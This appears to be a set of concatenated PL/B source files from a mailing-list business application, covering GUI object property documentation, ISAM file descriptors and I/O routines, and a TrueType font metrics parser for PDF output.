. Objects:
. BUTTON
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. DIALOG
. EDITTEXT
. GROUPBOX
. HSCROLLBAR
. ICON
. MREGION
. MOVIE
. PICT
. POPUPMENU ( OBSELETE )
. PROGRESS
. RADIOGRP
. RADIO
. SLIDER
. STATTEXT
. TABCONTROL
. VSCROLLBAR
. WINDOW
.
. dnumnvar values:
.
. The <dnumnvar> value is provided in the same units as used for
. the creation of an object. This means that if an object was
. created using pixels, then the width expects to use pixels.
.
*------------------------------------------------------------------------------
. WINOFFSETH=dnumnvar SETPROP GETPROP
.
. Description:
. This property is a GETPROP/SETPROP only property. The WINOFFSETH
. property identifies a relative horizontal offset for the
. visible viewing area of a WINDOW. By default the visible
. viewing offset starts with a zero value.
.
. Note1: It is possible to create objects outside the normal
. viewing area for a Window. If this is done, then the
. WINOFFSETH and WINOFFSETV properties can be used to
. bring these objects into the viewing area.
.
. Objects:
. WINDOW
.
. dnumnvar values:
.
. The <dnumnvar> value is a pixel value which defines a horizontal
. offset for the visible area of a Window.
.
*------------------------------------------------------------------------------
. WINOFFSETV=dnumnvar SETPROP GETPROP
.
. Description:
. This property is a GETPROP/SETPROP only property. The WINOFFSETV
. property identifies a relative vertical offset for the
. visible viewing area of a WINDOW. By default the
. visible viewing offset starts with a zero value.
.
. Note1: It is possible to create objects outside the normal
. viewing area for a Window. If this is done, then the
. WINOFFSETH and WINOFFSETV properties can be used to
. bring these objects into the viewing area.
.
. Objects:
. WINDOW
.
. dnumnvar values:
.
. The <dnumnvar> value is a pixel value which defines a vertical
. offset for the visible area of a Window.
.
*------------------------------------------------------------------------------
. WINPOS=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the positioning of a window when a
. window object is activated.
.
. The allowed window positioning types are as follows:
.
. ABSOLUTE - This causes a window object to be positioned to
. the top/left co-ordinates of the window object.
.
. DESKCENTER - This causes a window object to be centered on the
. desktop.
.
. PARENTCENTER - This centers a MODAL or MODELESS window object over the
. parent window. If the window object is not a MODAL or
. MODELESS window object, it is treated as if DESKCENTER
. was used.
.
. Objects:
. WINDOW
.
. dnumnvar values:
.
.$NONE EQU 0 // Same as Default
$ABSOLUTE EQU 1 // Default
$DESKCENTER EQU 2
$PARENTCENTER EQU 3
.
*------------------------------------------------------------------------------
. WINTYPE=dnumnvar CREATE GETPROP
.
. Description:
. This property specifies the type of window applied for the
. window object.
.
. The allowed window types are as follows:
.
. MODAL - This causes a MODAL dialog window to be created.
. When this window is activated using the ACTIVATE
. statement, the program execution remains at the
. at the ACTIVATE statement until the window is
. destroyed or deactivated. While a MODAL window
. is active, no events other than events for the MODAL
. window are processed until the MODAL window is
. terminated.
.
. MODELESS - This causes a MODELESS dialog window to be created.
. This window is a Window's popup window which will
. always remain on top of any primary window. Another
. feature is that this window acts as a child window
. to a primary window. If the primary window gets
. minimized, then the MODELESS dialog window is also
. minimized. However, the MODELESS dialog window
. does not affect the minimized task bar selections.
. The MODELESS dialog window can not be minimized.
. The MODELESS dialog window does not lock out event
. processing for other windows while the MODELESS
. window is active.
. OBJONLY - The use for the objects only window type is reserved
. for use by the PLB designer. If this type is used
. in a program, then it is implemented as a
. PRIMARYSIZE window type.
.
. PRIMARYFIXED - This type creates a Window's Primary window which
. can not be sized. A primary window can be minimized
. and maximized. A primary window will always be
. presented under a MODAL/MODELESS dialog window.
. If a primary window is active when a MODELESS window
. is created, then the primary window acts as the
. parent window for the MODELESS window.
.
. PRIMARYSIZE - The primary sized window type is a Windows' Primary
. window which can be sized. All other features are
. the same as PRIMARYFIXED.
.
. Objects:
. WINDOW
.
. dnumnvar values:
.
.$NONE EQU 0 // Same as Default
$MODAL EQU 1
$MODELESS EQU 2
$OBJONLY EQU 3 // PLFORM use only
$PRIMARYFIXED EQU 4
$PRIMARYSIZE EQU 5 // Default
.
*------------------------------------------------------------------------------
. WORDWRAP[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. For a MULTILINE edittext object this property causes
. the data entry to continue at the beginning of the
. next line when the right most boundary of the edittext
. object is encountered. If the <dnumnvar> value is not
. specified, the WORDWRAP property is set to ON.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. X1=dnumnvar SETPROP GETPROP
.
. Description:
. This property is a GETPROP/SETPROP only property. The X1 property
. specifies the X coordinate for the starting point of the LINE
. object.
.
. Objects:
. LINE
.
. dnumnvar values:
.
. The <dnumnvar> value is provided in the same units as used for
. the creation of an object. This means that if an object was
. created using pixels, then the X1 value expects to use pixels.
*------------------------------------------------------------------------------
. X2=dnumnvar SETPROP GETPROP
.
. Description:
. This property is a GETPROP/SETPROP only property. The X2 property
. specifies the X coordinate for the ending point of the LINE
. object.
.
. Objects:
. LINE
.
. dnumnvar values:
.
. The <dnumnvar> value is provided in the same units as used for
. the creation of an object. This means that if an object was
. created using pixels, then the X2 value expects to use pixels.
*------------------------------------------------------------------------------
. Y1=dnumnvar SETPROP GETPROP
.
. Description:
. This property is a GETPROP/SETPROP only property. The Y1 property
. specifies the Y coordinate for the starting point of the LINE
. object.
.
. Objects:
. LINE
.
. dnumnvar values:
.
. The <dnumnvar> value is provided in the same units as used for
. the creation of an object. This means that if an object was
. created using pixels, then the Y1 value expects to use pixels.
*------------------------------------------------------------------------------
. Y2=dnumnvar SETPROP GETPROP
.
. Description:
. This property is a GETPROP/SETPROP only property. The Y2 property
. specifies the Y coordinate for the ending point of the LINE
. object.
.
. Objects:
. LINE
.
. dnumnvar values:
.
. The <dnumnvar> value is provided in the same units as used for
. the creation of an object. This means that if an object was
. created using pixels, then the Y2 value expects to use pixels.
*------------------------------------------------------------------------------
. ZORDER=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies which object should be displayed
. on top when more than one object exists in the same space
. and in the same plane.
.
. Note1: Any objects in 'Plane 1' will always be on top of
. any object in 'Plane 0' with the exception of the
. TABCONTROL object. Although, the TABCONTROL object
. exists in 'Plane 1', the 'Plane 0' objects can be
. placed on top of the TABCONTROL by having a higher
. ZORDER value than the TABCONTROL.
.
. Note2: When the ZORDER value for any object is higher than
. any other object in the same plane, then the object
. with the higher value exists on top.
.
. Note3: The ZORDER exists for a window object only to define
. a default zorder starting value for objects created
. for that window object without an explicit ZORDER.
.
. Objects:
. BUTTON ;Plane 1
. CHECKBOX ;Plane 1
. CHECKGRP ;Plane 1
. COMBOBOX ;Plane 1
. DATALIST ;Plane 1
. EDITTEXT ;Plane 1
. GROUPBOX ;Plane 0
. HSCROLLBAR ;Plane 1
. ICON ;Plane 0
. LINE ;Plane 0
. MREGION ;Plane 0
. MOVIE ;Plane 1
. PICT ;Plane 0
. POPUPMENU ( OBSELETE ) ;Plane 1
. PROGRESS ;Plane 0
. RADIOGRP ;Plane 1
. RADIO ;Plane 1
. SHAPE ;Plane 0
. SLIDER ;Plane 1
. STATTEXT ;Plane 0
. TABCONTROL ;Plane 1
. VSCROLLBAR ;Plane 1
. WINDOW ;No Plane
.
. dnumnvar values:
.
. The <dnumnvar> value is a user defined value.
.
<file_sep>/include/NMDCCATDD.inc
.* MIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. FILE: NINMDCCAT
. LENGTH:
. COMPRESS: NONE
. TYPE:
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
......................................................
NMDCCNAME Init "NINMDCCAT.Isi|NINS1:502"
NMDCCFLIST FileList
NMDCCFILE IFILE Name="NINMDCCAT.Isi|NINS1:502"
NMDCCFILE2 IFILE Name="NINMDCCAT2.Isi|NINS1:502"
FileListEnd
NMDCCSFILE FILE
NMDCCFLAG FORM 1
NMDCCPATH FORM 1
NMDCCFld Dim 6
NMDCCFld2 Dim 3
.
NMDCCVARS LIST
NMDCCnum Dim 6 1-6 Card# Key
NMDCCSQN Form 2 7-8 Category Seq#
NMDCCCATC Dim 3 9-11 Category COde Key
NMDCCCAT FOrm 5.2 12-19 Category DOllar
NMDCCCATCHR dim 4 20-23 Category option -char
NMDCCCATR Dim 1 24-24 Rate M/L
NMDCCCATDSC Dim 25 29-49 Description
ListEnd
<file_sep>/include/LSTIIO.inc
..............................................................................
.
. LSTIIO LSTIUSION
.
.INcome by List projections data descriptor
.used for List management income reporting to Owners
..............................................................................
.
. ENTRY POINT : LSTIKEY
. REQUIRED : 'LSTIFLD'
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
LSTIKEY BRANCH LSTIFLAG TO LSTI1
CALL LSTIOPEN
LSTI1 trap IOMSSG GIVING ERROR if IO
FILEPI 1;LSTIFILE
READ LSTIFILE,LSTIFLD;LSTIVARS
TRAPCLR IO
RETURN
..............................................................................
.
. ENTRY POINT : LSTITST
. REQUIRED : LSTIFLD
. DESCRIPTION : TEST KEY
.
LSTITST BRANCH LSTIFLAG TO LSTI2
CALL LSTIOPEN
LSTI2 trap IOMSSG GIVING ERROR if IO
FILEPI 1;LSTIFILE
READ LSTIFILE,LSTIFLD;STR1
TRAPCLR IO
RETURN
..............................................................................
.
. ENTRY POINT : LSTIKS
. REQUIRED :
. DESCRIPTION : KEY SEQUENTIAL FILE READ
.
LSTIKS BRANCH LSTIFLAG TO LSTI3
CALL LSTIOPEN
LSTI3 trap IOMSSG GIVING ERROR if IO
FILEPI 1;LSTIFILE
READKS LSTIFILE;LSTIVARS
TRAPCLR IO
RETURN
..............................................................................
.
. ENTRY POINT : LSTISEQ
. REQUIRED :
. DESCRIPTION : SEQUENTIAL FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
LSTISEQ
BRANCH LSTIFLAG TO LSTI4
CALL LSTIOPEN
LSTI4 trap IOMSSG GIVING ERROR if IO
FILEPI 1;LSTIFILE
READ LSTIFILE,SEQ;LSTIVARS
TRAPCLR IO
RETURN
..............................................................................
.
. ENTRY POINT : LSTIWRT
. REQUIRED : 'LSTIFLD'
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
LSTIWRT Branch LSTIflag to LSTI5
CALL LSTIOPEN
LSTI5 TRAP IOMSSG GIVING ERROR IF IO
FILEPI 1;LSTIFILE
WRITE LSTIFILE,LSTIFLD;LSTIVARS
TRAPCLR IO
RETURN
..............................................................................
.
. ENTRY POINT : LSTIUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE RETURN-TO FILE
.
LSTIUPD BRANCH LSTIFLAG TO LSTI6
CALL LSTIOPEN
LSTI6 TRAP IOMSSG GIVING ERROR IF IO
FILEPI 1;LSTIFILE
UPDATE LSTIFILE;LSTIVARS
TRAPCLR IO
RETURN
..............................................................................
.
. ENTRY POINT : LSTIDEL
. REQUIRED : 'LSTIFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
LSTIDEL BRANCH LSTIFLAG TO LSTI7
CALL LSTIOPEN
LSTI7 TRAP IOMSSG GIVING ERROR IF IO
FILEPI 1;LSTIFILE
DELETE LSTIFILE,LSTIFLD
TRAPCLR IO
RETURN
...............................................................................
.
. ENTRY POINT : LSTIOPEN
. REQUIRED : 'LSTIFLAG'
. RETURNED : 'LSTIFLAG' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
LSTIOPEN
TRAP LSTIGONE IF IO
.
OPEN LSTIFILE,LSTINAME
TRAPCLR IO
MOVE C1 TO LSTIFLAG
RETURN
.
LSTIGONE MOVE LSTINAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/MDC035IO.inc
..............................................................................
.******************************************************
.* M035 List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* M035 DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_035
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: Isam
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Secondary FIles See
.MDCSEGADD - Segment info universe & $
.MDSMSCDD - Misc addressing M035, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - MDC Main???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
...............................................
. ENTRY POINT : M035KEY
. REQUIRED : 'M035Fld'
. RETURNED : RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
M035KEY BRANCH M035Flag TO M0351
CALL M035Open
M0351 FILEPI 1;M035File
READ M035File,M035Fld;M035Vars
RETURN
..............................................................................
.
. ENTRY POINT : M035TST
. REQUIRED : M035Fld
. RETURNED :
. DESCRIPTION : TEST KEY
.
M035TST BRANCH M035Flag TO M0352
CALL M035Open
M0352 FILEPI 1;M035File
READ M035File,M035Fld;STR1
RETURN
..............................................................................
.
. ENTRY POINT : M035KS
. REQUIRED :
. RETURNED : M035 Main Record
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
M035KS BRANCH M035Flag TO M0353
CALL M035Open
M0353 FILEPI 1;M035File
READKS M035File;M035Vars
RETURN
..............................................................................
. ENTRY POINT : M035SEQ
. REQUIRED :
. RETURNED : M035 Main Record
. DESCRIPTION : SEQUENTIAL MDC MainFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLGS
.
M035SEQ BRANCH M035Flag TO M0354
CALL M035Open
M0354 FILEPI 1;M035File
READ M035File,SEQ;M035Vars
RETURN
..............................................................................
.
. ENTRY POINT : M035WRT
. REQUIRED : 'M035Fld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
M035WRT BRANCH M035Flag TO M0355
CALL M035Open
M0355 FILEPI 1;M035Flist
WRITE M035FLIST;M035Vars
RETURN
..............................................................................
.
. ENTRY POINT : M035UPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE MDC MainFILE
.
M035UPD BRANCH M035Flag TO M0356
CALL M035Open
M0356
FILEPI 1;M035FList
UPDATE M035FList;M035Vars
RETURN
..............................................................................
.
. ENTRY POINT : M035DEL
. REQUIRED : 'M035Fld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
M035DEL BRANCH M035Flag TO M0357
CALL M035Open
M0357 FILEPI 1;M035FList
DELETE M035FList
RETURN
..............................................................................
.
. ENTRY POINT : M035Open
. REQUIRED : 'M035Flag' 'M035PATH'
. RETURNED : 'M035Flag' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN MDC MainFILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
M035Open TRAP M035GONE giving error IF IO
OPEN M035FList
TRAPCLR IO
MOVE C1 TO M035Flag
RETURN
..............................................................................
M035GONE MOVE M035NAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/DEVELOP/Includes - why/ndatBdd.inc
******************************************************
* DATACARD FILE DESCRIPTOR.
. ....................................................
* ****************************************************
* NAMES IN THE NEWS MASTER DATACARD FILE.
* ****************************************************
.
. FILE: NINDAT
. LENGTH: 600
. COMPRESS: NONE
. TYPE: AIM,ISAM,MANAGED
. INDEX KEY: 2-7 LSTNUM
. 64-138 MLSTNAME
.AIMDEX KEY: 2-7 LSTNUM
. 64-138 MLSTNAME
. 14-19 DATFUL
. 1-1 STATUS
. 32-32 NEW BYTE
. 33-33 EXCLUSIVE BYTE
......................................................
. LAST MODIFIED
. patch 1.4 12September2006 DLH - Fulfillment & Min Changes
. patch 1.3 29JUNE2006 DMS - Add search, as per 6/12/2006 CTF Meeting
. patch 1.2 21JUNE2006 ASH - Added aamdex for Fulfillment Number
. - 06Jul04 DLH Added NDatLUsage
. - 29Jul02 ASH Began conversion Process
.Secondary FIles See
. include ntxtdd.inc - DATACARD TEXT FILE
. include nadddd.inc - address codes
. include narrdd.inc - Arrangement codes
. include ncatdd.inc - CATEGORY FILE DESCRIPTOR.
. include NSLTdd.inc - SELECTION CODE FILE DESCRIPTOR.
. include nsrcdd.inc - SOURCE CODE FILE DESCRIPTOR.
. include nmoddd.inc - PRICE MODIFIER FILE DESCRIPTOR.
. include nusedd.inc - VARIaBLES MODULE FOR DATABUS PORT/USER IDENTIFICATION.
. INclude NMDCMsc.inc - additional info (currently from MIN) need to incorporate
. INClude NMDCCAT.inc - Min Category
.
. - 18JUN2005 DMB IP Address changed for File Manager
. - 06Apr2005 ASH Modifed COMMPER
. - 15Nov95 DLH add key by name
. - 12/10/85 ADDED ONE BYTE TO EACH CATEGORY CODE, DELETED
. BLANK8. RECORD SIZE NOW VARIABLE TO MAX 2813.
......................................................
NDATBNAME DIM 35
NDATBNME1 INIT "NINDATB "
NDATBNME2 INIT "NINDATB "
NDATBNME3 INIT "NINDATB4 " nindat3 is used for tdmc info (argh)
NDATBFLIST FILELIST
NDATBFILE IFILE KEYLEN=6,FIXED=617,Name="NINDATB.ISI|NINS1:502"
NDATBFLE3 IFILE KEYLEN=23,FIXED=617,Name="NINDATB4.ISI|NINS1:502"
.
NDATBFLE2 AFILE FIXED=617,Name="NINDATB.AAM|NINS1:502"
FILELISTEND
NDATBLOCK FORM 1 0 OR 1=filepi,2=recordlock, 3=no lock
NDATBFLD DIM 6
NDATBFLD1 DIM 9
NDATBFLD2 DIM 78
NDATBFLD3 DIM 75
NDATBFLD4 DIM 9
NDATBFLD5 DIM 4
NDATBFLD6 DIM 4
NDATBFLD7 DIM 4
NDATBFLAG FORM 1
NDATBPATH FORM 1
.
DATBVARS LIST
DatVars
.datvars - see Ndatdd.inc
NDatBStamp Dim 17
LISTEND
<file_sep>/include/nfuldd.inc
............................................................
.
. NFULDD INCLUSION
. NIN FULFILLMENT FILE DEFINITION
.
. FILE NAME : NINFUL
. REC LENGTH: 273 FIXED
. INDEX KEY : NFULNUM
. AAMDEX KEY: NFULCOMP
. NFULCNT
. NFULTELE
.18 JUN 2005 DMB IP Changed for File Manager
.16 May 2005 DLH add email
............................................................
NFULLIST Filelist
.NFULFILE IFILE KEYLEN=4,FIX=273,UNCOMP,Name="NINFUL.ISI|20.20.30.103:502"
NFULFILE IFILE KEYLEN=4,FIX=273,UNCOMP,Name="NINFUL.ISI|NINS1:502"
.NFULFLE2 AFILE FIX=273,Name="NINFUL.AAM|20.20.30.103:502"
NFULFLE2 AFILE FIX=273,Name="NINFUL.AAM|NINS1:502"
Filelistend
NFULFLSQ FILE
.NFULNAME INIT "NINFUL|20.20.30.103:502 "
NFULNAME INIT "NINFUL|NINS1:502 "
NFULFLD DIM 4
NFULFLD1 DIM 48
NFULFLD2 DIM 48
NFULFLD3 DIM 13
NFULPATH FORM 1
NFULFLAG FORM 1
NFULFLG2 FORM 1
NFULLOCK FORM 1
.
NFULVARS list
NFULNUM dim 4 1-4 .Record Num(ISAM)
NFULCOMP dim 45 5-49 .Company Name(AAM)
NFULCNT dim 45 50-94 .Contact Name(AAM)
NFULFAX dim 10 95-104 .Phone Number(AAM)
NFULDATE dim 8 105-112 .Creation Date
NFULMODDATE dim 8 113-120 .Modification Date
NFULINITS dim 3 121-123 .Initials
NFULNOTES dim 100 124-223 .Notes
NFULEmail dim 50 224-273
;NFULFill dim 50 224-273
listend
............................................................
<file_sep>/DEVELOP/Includes - why/pdfttf.inc
.
. get information from TrueType font files
.
. This version only supports 8-bit character sets.
. TTF normally has a unicode character->glyph maping table but as
. the PL/B language doesn't support unicode, there is no need to
. parse it.
.
. This version does not subset embedded TTF fonts.
.
.some standard windows fonts... everybody should have these so don't embed them.
.
winfontscount const "12"
winfonts dim 250(winfontscount),("C:\WINDOWS\FONTS\TIMES.TTF"):
("C:\WINDOWS\FONTS\TIMESBD.TTF"):
("C:\WINDOWS\FONTS\TIMESI.TTF"):
("C:\WINDOWS\FONTS\TIMESBI.TTF"):
("C:\WINDOWS\FONTS\ARIAL.TTF"):
("C:\WINDOWS\FONTS\ARIALBD.TTF"):
("C:\WINDOWS\FONTS\ARIALI.TTF"):
("C:\WINDOWS\FONTS\ARIALBI.TTF"):
("C:\WINDOWS\FONTS\COUR.TTF"):
("C:\WINDOWS\FONTS\COURBD.TTF"):
("C:\WINDOWS\FONTS\COURI.TTF"):
("C:\WINDOWS\FONTS\COURBI.TTF")
.
pdfFontCache IFILE
dim260 dim 260
hash dim 16
hashkey dim 24
fontattr record
hash dim 24
Filename dim 260
Name dim 80 //
embedOK form 1
FirstChar form "32" //
LastChar form "255" //
Widths form 5(0..256) //
MissingW form 5 //
Flags form 10 // need to parse OS/2 table to determin serif font!!
Stemv form 2 // ?? default ??
Ascent form 5 //
Descent form 5 //
.capheight form 5
Bbox record //
L form 5 //
B form 5 //
R form 5 //
T form 5 //
recordend
.Unicode form 1 //Font is unicode!!!
recordend
cmap record
format integer 2
length integer 2
lang integer 2
glyphArray integer 1(0..255)
recordend
cmap6 record
format integer 2
length integer 2
lang integer 2
firstCode integer 2
entryCount integer 2
glyphArray integer 2(0..255) // hope we can do 8 bit with unicode table
recordend
d2 dim 2
$2bytes record
int1 integer 1
int2 integer 1
recordend
d4 dim 4
$4bytes record
int1 integer 1
int2 integer 1
int3 integer 1
int4 integer 1
recordend
swap2 macro ¶m
move ¶m,d2
unpack d2,$2bytes
pack d2,$2bytes.int2,$2bytes.int1
move d2,¶m
mend
swap4 macro ¶m
move ¶m,d4
unpack d4,$4bytes
pack d4,$4bytes.int4,$4bytes.int3,$4bytes.int2,$4bytes.int1
move d4,¶m
mend
.
. Read TTF file directly...
. Code ported from LIBHARU hpdf_fontdef_tt.c
.
AttrIdx form 1
NumOfTTFonts form 2
TTFonts RECORD [30] //allow use of 30 TT fonts
File dim 260
Res form 3[0..3] // 0=plane 1=bold 2=italic 3=Bold+Italic
Descriptor form 3
recordend
PDFTTFont FUNCTION
filename dim 260
fsize form 3
attrib dim ^
ENTRY
FontFile FILE
Header record
version integer 4
tablecnt integer 2
search integer 2
entrsel integer 2
range integer 2
recordend
.
table record (40) // max 20 table entries
tag dim 4
checksum integer 4
offset integer 4
length integer 4
recordend
.
head record
ver integer 4
rev integer 4
chk integer 4
magicnm integer 4
flags integer 2
units_p integer 2 //
created dim 8
modified dim 8
x_min integer 2 bbox
y_min integer 2
x_max integer 2
y_max integer 2
mac_stl integer 2
low_rec_ppem integer 2
font_direction integer 2
loc_fmt integer 2
glyph_fmt integer 2
recordend
.
hhea record
ascent integer 2
descent integer 2
dim 26
h_metric integer 2 //count of
recordend
.
cmapt record
version integer 2
count integer 2
recordend
savepos integer 4
cmapEnt record
platform integer 2
encoding integer 2
offset integer 4
recordend
cmapfmt integer 2
.
nametbl record
format integer 2
count integer 2
strOff integer 2
recordend
.
nameEnt record (100)
platform integer 2
encoding integer 2
language integer 2
nameID integer 2
length integer 2
offset integer 2
recordend
.
cntr integer 1
cntr1 integer 1
int2 integer 2
int2a integer 2
noffset integer 4
nlen integer 2
aoffset integer 4
alen integer 2
.
fm10 form 10
streamdat dim ^
.
.HasCmapEnc6 form 1
// Get attribute index first
CLEAR AttrIdx
MOVEPTR attrib,attrib
IF NOT OVER
WHEREIS "Italic",Attrib
IF NOT ZERO
ADD "2",AttrIdx
ENDIF
WHEREIS "Bold",Attrib
IF NOT ZERO
ADD "1",AttrIdx
ENDIF
ENDIF
.
. check if font already used
.
UPPERCASE Filename
FOR cntr,1,NumOfTTFonts
IF (filename=TTFonts(cntr).File)
// re-using so we know data is in the cache at this point
CALL ReadTTFCache using filename
IF ( TTFonts(cntr).Res(AttrIdx) )
// re-use
SQUEEZE TTFonts(cntr).Res(AttrIdx),scratch
PACK CurFontRes,"/TF",scratch," ",scratch," 0 R"
.
PACK CurrentFont,"/TF",scratch," ",fsize," Tf"
reset page(curpage).fontres
SCAN CurFontRes,page(curpage).fontres
IF NOT EQUAL
ENDSET page(curpage).fontres
APPEND CurFontRes,page(curpage).fontres
ENDIF
SET usingttf
SETFLAG NOT OVER
RETURN
ELSE
// new base font object, re-use descriptor
CALL WriteBaseFont using cntr,TTFonts(cntr).Descriptor,fsize,attrib
ENDIF
GOTO LoadLocal
ENDIF
REPEAT
.
. load data from cache if we have ever used this font
.
EXCEPTSET nocache if io
CALL ReadTTFCache using filename
GOTO FromCache IF NOT OVER
.
. first time use, parse the TTF file for font metrix
.
nocache
EXCEPTCLEAR io
CLEAR fontattr
MOVE "32",fontattr.FirstChar
MOVE "255",fontattr.LastChar
.
. Load the header and TTF table of contents
.
MOVE filename,Fontattr.Filename
OPEN FontFile,filename,READ
READ FontFile,seq;*ABSON,Header;
swap2 Header.tablecnt
.
FOR cntr,1,Header.tablecnt
READ FontFile,seq;*ABSON,table(cntr);
swap4 table(cntr).offset
REPEAT
.
. we have the tables and they can appear in any order but they must be
. processed in a particular order due to dependancies.
.
FOR cntr,1,Header.tablecnt
BREAK IF (table(cntr).tag="head")
REPEAT
REPOSIT FontFile,table(cntr).offset
READ FontFile,seq;*ABSON,head;
swap2 head.x_min
swap2 head.y_min
swap2 head.x_max
swap2 head.y_max
swap2 head.units_p
.
. // make signed and calculate pdf glyph box
MOVE head.x_min,fm10
IF (fm10 > 32768 )
SUB "65536",fm10
ENDIF
CALC fontattr.bbox.l = fm10 * 1000 / head.units_p
.
MOVE head.y_min,fm10
IF (fm10 > 32768 )
SUB "65536",fm10
ENDIF
CALC fontattr.bbox.b = fm10 * 1000 / head.units_p
.
MOVE head.x_max,fm10
IF (fm10 > 32768 )
SUB "65536",fm10
ENDIF
CALC fontattr.bbox.r = fm10 * 1000 / head.units_p
.
MOVE head.y_max,fm10
IF (fm10 > 32768 )
SUB "65536",fm10
ENDIF
CALC fontattr.bbox.t = fm10 * 1000 / head.units_p
.
FOR cntr,1,Header.tablecnt
BREAK IF (table(cntr).tag="hhea")
REPEAT
REPOSIT FontFile,(table(cntr).offset+4)
READ FontFile,seq;*ABSON,hhea;
swap2 hhea.ascent
swap2 hhea.descent
swap2 hhea.h_metric
.
MOVE hhea.ascent,fm10
IF (fm10 > 32768 )
SUB "65536",fm10
ENDIF
CALC fontattr.ascent = fm10 *1000 / head.units_p
.
MOVE hhea.descent,fm10
IF (fm10 > 32768 )
SUB "65536",fm10
ENDIF
CALC fontattr.descent = fm10 *1000 / head.units_p
.
. get char mapping (http://developer.apple.com/fonts/ttrefman/rm06/Chap6cmap.html)
.
FOR cntr,1,Header.tablecnt
BREAK IF (table(cntr).tag="cmap") // char -> glyph index mapping
REPEAT
REPOSIT FontFile,table(cntr).offset
READ FontFile,seq;*ABSON,cmapt;
swap2 cmapt.version
swap2 cmapt.count
.
. locate byte encoding
.
FOR cntr1,1,cmapt.count
READ FontFile,seq;*ABSON,cmapEnt;
swap2 cmapEnt.platform
swap2 cmapEnt.encoding
swap4 cmapEnt.offset
FPOSIT FontFile,savepos
REPOSIT FontFile,( table(cntr).offset + cmapEnt.offset )
READ FontFile,seq;*ABSON,cmapfmt
swap2 cmapfmt
IF ( cmapfmt = 0 )
BREAK
ENDIF
. if ( cmapfmt = 6 )
. set HasCmapEnc6
. REPOSIT FontFile,( table(cntr).offset + cmapEnt.offset )
. READ FontFile,seq;*ABSON,cmap6;
. swap2 cmap6.format
. swap2 cmap6.length
. swap2 cmap6.lang
. swap2 cmap6.firstCode
. swap2 cmap6.entryCount
. IF (cmap6.entryCount > 256)
. MOVE "256",cmap6.entryCount
. ENDIF
. ENDIF
REPOSIT FontFile,savepos
REPEAT
.
IF ( cntr1 > cmapt.count ) //and HasCmapEnc6 = 0)
SETFLAG OVER
RETURN
ENDIF
. ELSE IF ( cntr1 > cmapt.count )
. MOVE cmap6.format,cmap.format
. move cmap6.length,cmap.length
. move cmap6.lang,cmap.length
. move cmap6.firstCode,fontattr.FirstChar
. move cmap6.firstCode,fontattr.LastChar
. Add cmap6.entryCount,fontattr.LastChar
. for cntr1,1,cmap6.entryCount
. swap2 cmap6.glyphArray(cntr1)
. move cmap6.glyphArray(cntr1),cmap.glyphArray(cntr1)
. repeat
. ELSE
.
REPOSIT FontFile,( table(cntr).offset + cmapEnt.offset )
READ FontFile,seq;*ABSON,cmap;
swap2 cmap.format
swap2 cmap.length
swap2 cmap.lang
. ENDIF
.
.
. get char widths
.
FOR cntr,1,Header.tablecnt
BREAK IF (table(cntr).tag="hmtx") // horizontal metrix...Widths
REPEAT
REPOSIT FontFile,table(cntr).offset
.
. fonts can have thousands of characters... we only want the 8 bit ansi set
.
IF (hhea.h_metric > 254 ) // only working with 8 bit characters
MOVE "254",hhea.h_metric
ENDIF
.
FOR cntr,0,hhea.h_metric
READ FontFile,seq;*ABSON,int2; // advance_width
swap2 int2
CALC fontattr.Widths(cntr) = int2 * 1000 / head.units_p
if (fontattr.Widths(cntr) )
MOVE fontattr.Widths(cntr),int2a // save in case of incomplete table
ENDIF
READ FontFile,seq;*ABSON,int2; // lsb ??
REPEAT
if (hhea.h_metric<254)
loop
MOVE int2a,fontattr.Widths(cntr)
incr cntr
until (cntr>254)
repeat
endif
MOVE fontattr.Widths(cmap.glypharray(32)),fontattr.MissingW // just use space width for missing
IF (fontattr.widths(cmap.glypharray(105)) = fontattr.widths(cmap.glypharray(119))) // compair 'i' to 'w' for fixed
ADD "1",fontattr.Flags
ENDIF
.
. get the font name
.
FOR cntr1,1,Header.tablecnt
break if (table(cntr1).tag="name") // name and attributes
REPEAT
REPOSIT FontFile,table(cntr1).offset
.
READ FontFile,seq;*ABSON,nametbl;
swap2 nametbl.format
swap2 nametbl.count
swap2 nametbl.strOff
FOR cntr,1,nametbl.count
READ FontFile,seq;*ABSON,nameEnt(cntr);
swap2 nameEnt(cntr).platform
swap2 nameEnt(cntr).encoding
. swap2 nameEnt(cntr).language // not used
swap2 nameEnt(cntr).nameID
